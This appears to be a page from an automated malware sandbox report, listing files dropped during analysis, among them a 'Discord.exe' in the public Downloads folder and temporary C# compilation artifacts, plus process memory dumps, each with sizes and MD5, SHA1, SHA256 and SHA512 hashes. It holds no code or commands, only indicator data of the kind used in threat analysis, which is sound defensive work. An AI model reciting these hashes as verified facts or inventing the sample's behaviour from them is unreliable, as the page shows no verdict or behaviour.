C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
5f387dbf04fad637b4906888b53250ae

SHA1
42a8fdde0e7806c4969a324022c60aa8921b86eb

SHA256
440ca2b588d15c36ab779c6d199d6d31e5bd6583956c90f473ba37f778c92d02

SHA512
899218699281336328899ec88c0811f310c3e11c44d68aa68810d9ce1dc9f99ff7a4abacd33c0581bae723c151852ded15b4a552bbdae916b782a0478affcb80

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
7b45b7d6aeb3d67d97ba7cff078298ca

SHA1
42f11c7876c07ed53cfaf1829395effa62b76831

SHA256
11b5cbba6e148e468a85c60c264b2212b8e6f2f66c2256b3b737f040bb48dfb1

SHA512
78603ed9675ca482bcc799f82a9b2d57a108f159a51f9a869ddbf8f670869e2bc3f183de8b45ec7387d082a0c270d623bc52d4331f940d4b8047305201482ce2

Download Submit
C:\Users\Public\Downloads\Discord.exe

Filesize
66KB

MD5
879e4ad359e88bc384ee197e68728b50

SHA1
f7547bfe974d52fe71c5e8f5e8195732f1736509

SHA256
0cfc81ec769e4cb977cd2fadc68a766a2a80f80691c0b8f8517f468b8cf4fdfe

SHA512
23cc1aa66bf4158310258bcfa806c89085ec43a0f476d4e46d6da8c4f91a38b8b653a7a50c736592894d29301f95ef76866c3d920f1aeb2d51248bbeaa144e97

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0sb5rtez\0sb5rtez.0.cs

Filesize
382B

MD5
052dc4c2a20c1de06cb964211096f72d

SHA1
49ead66bc8b5ac07df5f09ead915a995e746d92e

SHA256
77bf842019d6f2269af39df02a0f1e255695f3a166ee740559349f51b3d3449b

SHA512
b624486b9f3c60241ab578ed681d819b2ad2067e49de1306d7be9e1a9d079a457a42a21443e75a6fbe2444f33ec7a84fd82c811deab291e4ca9feed2180102e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0sb5rtez\0sb5rtez.cmdline

Filesize
369B

MD5
79b655c5f378c837b943a34066bcc6cd

SHA1
9a9843cbd5041ecb102648857dce3805c62765df

SHA256
4d7524e6ba63288e6a14ff81c9cd3a4d838dc206f0cb4c45df6788fb411ca9e2

SHA512
187a896ac7b6d231ad93609bde62b30d85988d884f5361bd1cb6453d9546ba59b1a4fd297390e9dd0c09c3145814faabbc8481e2c7adab1e06f6a329133b3144

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0sb5rtez\CSC3A3CAA7EC2D84F19B489B3B43B873448.TMP

Filesize
652B

MD5
31ac078195ef0626980e682f4689f58f

SHA1
1577351b909cd2f87f87195ba53b3c1d8d388f0e

SHA256
17720236d21acd85acae138ebe146c98b3fd450d8f45b78cbab2e33c2a96740e

SHA512
a921ad12e2481a707bfbbc2f40bd5441e1efa3024bba3df39c840090928eef9c5d8848d0cd8f19607362700f54303a88726540c2e1e918e9e457d2485cb018b1

Download Submit
memory/1600-15-0x00007FFB1DFB0000-0x00007FFB1EA72000-memory.dmp

Filesize
10.8MB

Download
memory/1600-18-0x00007FFB1DFB0000-0x00007FFB1EA72000-memory.dmp

Filesize
10.8MB

Download
memory/1600-2-0x00007FFB1DFB3000-0x00007FFB1DFB5000-memory.dmp

Filesize
8KB

Download
memory/1600-14-0x00007FFB1DFB0000-0x00007FFB1EA72000-memory.dmp

Filesize
10.8MB

Download
memory/1600-13-0x00007FFB1DFB0000-0x00007FFB1EA72000-memory.dmp

Filesize
10.8MB

Download
memory/1600-12-0x000001F2AF010000-0x000001F2AF032000-memory.dmp

Filesize
136KB

Download
memory/4860-55-0x0000028D363A0000-0x0000028D363A8000-memory.dmp

Filesize
32KB

Download
memory/4860-36-0x0000028D364E0000-0x0000028D366A2000-memory.dmp

Filesize
1.8MB

Download
memory/5288-304-0x0000000000A20000-0x0000000000A36000-memory.dmp

Filesize
88KB

Download